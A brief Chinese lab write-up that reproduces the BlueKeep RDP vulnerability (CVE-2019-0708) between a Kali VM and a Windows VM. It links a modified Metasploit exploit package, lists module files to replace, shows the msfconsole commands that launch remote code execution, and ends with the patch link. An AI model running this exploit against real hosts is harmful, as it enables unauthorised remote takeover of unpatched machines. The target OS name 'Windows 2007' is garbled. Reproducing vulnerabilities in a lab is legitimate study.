BlueKeep(CVE-2019-0708)是微软远程桌面协议(RDP)实现中发现的一个安全漏洞,它允许远程执行代码。
复现过程:
目标机:Windows 2007 X64 192.168.30.129
攻击机:kali 192.168.30.128
windows配置
kali 配置 - MSF下替换文件
EXP下载地址:https://github.com/backlion/demo/blob/master/CVE-2019-0708_RDP%20_MSF.zip
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
root@kali:~# msfconsole
msf5 > reload_all #重新加载所有模块
msf5 > search cve_2019_0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set RHOSTS 192.168.30.129
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >set target 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >run
执行whoami
遇到的坑
这种情况是把虚拟机打蓝屏了,此时,关机重启,多试几次。哈哈哈哈哈!(鬼知道我打蓝屏了多少次)
修复建议:
安装微软为2019-0708推出的专用补丁:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708